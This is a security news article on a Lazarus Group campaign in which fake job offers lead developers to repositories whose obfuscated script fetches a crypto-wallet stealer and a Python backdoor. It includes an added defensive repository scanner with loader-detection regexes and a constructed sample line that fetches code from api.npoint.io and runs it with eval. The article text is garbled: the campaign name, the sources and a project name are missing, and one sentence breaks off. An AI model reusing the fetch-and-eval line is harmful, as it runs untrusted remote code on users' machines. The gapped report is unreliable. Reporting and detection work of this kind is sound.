Cross-Platform JavaScript Stealer Targets Crypto Wallets in New Lazarus Group Campaign

Feb 05, 2025 | Ravie Lakshmanan | Cryptocurrency / Data Breach

A fake LinkedIn job offer in the cryptocurrency and travel sectors, delivering malware capable of infecting Windows, macOS, and Linux systems, has been linked to the North Korea-linked Lazarus Group.

According to security firm Bitdefender, the scam begins with a message sent on a professional social media network, enticing targets with the promise of remote work, part-time flexibility, and good pay.

Once the target expresses interest, the scammer requests a resume or even a link to a personal GitHub repository, according to a report shared with The Hacker News.

"Although seemingly innocent, these requests may serve malicious purposes, such as harvesting personal information or lending a facade of legitimacy to the conversation."

Once the requested information is obtained, the attack moves to the next stage, where the threat actor, posing as a recruiter, shares a link to a GitHub or Bitbucket repository containing a minimum viable product (MVP) version of a purported decentralized exchange (DEX) project and asks the victim to check it out and offer feedback.

Present in the code is an obfuscated script that is configured to fetch a next-stage payload from api[.]npoint[.]io: a cross-platform JavaScript information stealer that can harvest data from various cryptocurrency wallet extensions that may be installed in the victim's browser.
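As an added defensive illustration (not code from the article or from Bitdefender's report), a small pre-review triage scan for a cloned repository that flags the pattern described above: a script that pulls remote content, references the host named here, or pairs a remote fetch with dynamic evaluation or heavily encoded strings. The second watched host and the sample scripts are constructed placeholders.

```python
"""Triage scan for a cloned repo before reviewing or running it (added example)."""
import re
from pathlib import Path

# api.npoint.io is the host named in the article; the second entry is a
# constructed placeholder for any other host a team chooses to watch.
WATCHED_HOSTS = ("api.npoint.io", "example-paste-host.invalid")

# Heuristics typical of obfuscated JavaScript loaders (defender-side markers).
PATTERNS = {
    "remote_fetch": re.compile(r"\b(fetch|axios\.get|https?\.get)\s*\("),
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\("),
    "hex_escapes": re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),   # long \xNN runs
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
}

def scan_text(text: str) -> dict:
    """Return which markers one file's content triggers."""
    hits = {name: bool(p.search(text)) for name, p in PATTERNS.items()}
    hits["watched_host"] = any(h in text for h in WATCHED_HOSTS)
    # Loader-like: remote fetch (or a watched host) combined with code
    # execution or heavy encoding, the stager shape described in the article.
    hits["loader_like"] = (hits["remote_fetch"] or hits["watched_host"]) and (
        hits["dynamic_eval"] or hits["hex_escapes"] or hits["long_base64"])
    return hits

def scan_repo(root: Path) -> list:
    """Scan JS/TS/JSON files (package.json lifecycle scripts included)."""
    findings = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in (".js", ".mjs", ".ts", ".json"):
            hits = scan_text(path.read_text(errors="ignore"))
            if hits["loader_like"] or hits["watched_host"]:
                findings.append((str(path.relative_to(root)), hits))
    return findings

# Constructed samples: a loader-shaped snippet and an ordinary module.
CONSTRUCTED_LOADER = (
    "const u='https://api.npoint.io/EXAMPLE-ID';"
    "fetch(u).then(r=>r.text()).then(t=>eval(t));"
)
CONSTRUCTED_CLEAN = "export function add(a, b) { return a + b; }"

if __name__ == "__main__":
    for label, sample in (("loader", CONSTRUCTED_LOADER), ("clean", CONSTRUCTED_CLEAN)):
        print(label, scan_text(sample))
```

Run `scan_repo(Path("path/to/clone"))` against a freshly cloned repository before installing dependencies; a hit is a reason to inspect the file by hand, not proof of compromise.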

The stealer also doubles as a loader for a Python-based backdoor that is responsible for monitoring clipboard changes, maintaining persistent remote access, and dropping additional malware.

The tactics described in Bitdefender's report overlap with a known attack activity cluster called (also known as DeceptiveDevelopment and DEV#POPPER), which is designed to drop a JavaScript stealer called BeaverTail and a Python implant known as InvisibleFerret.

The malware deployed by means of the Python backdoor is a .NET binary that can download and start a TOR proxy to communicate with a command-and-control (C2) server, exfiltrate basic system information, and deliver another payload that, in turn, can siphon sensitive data, log keystrokes, and launch a cryptocurrency miner.

The threat actors' infection chain is "complex, containing malicious software written in multiple programming languages and leveraging a variety of techniques, including .NET-based stagers capable of disabling security tools, setting up a Tor proxy, and launching crypto miners," according to Bitdefender. These include multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that first gathers system data before pivoting to additional payloads, and .NET-based stage

According to reports shared on and , there is evidence that these efforts are widespread, with minor adjustments to the overall attack chain. In some cases, candidates are required to clone a Web3 repository and run it locally as part of an interview, while in others, they are instructed to fix intentionally bugged code.

A project with the name "" is referenced in one of the Bitbucket repositories in question. It is no longer accessible on the code hosting platform.

The findings come a day after SentinelOne reported that another malware family codenamed FlexibleFerret is being distributed through the Contagious Interview campaign.
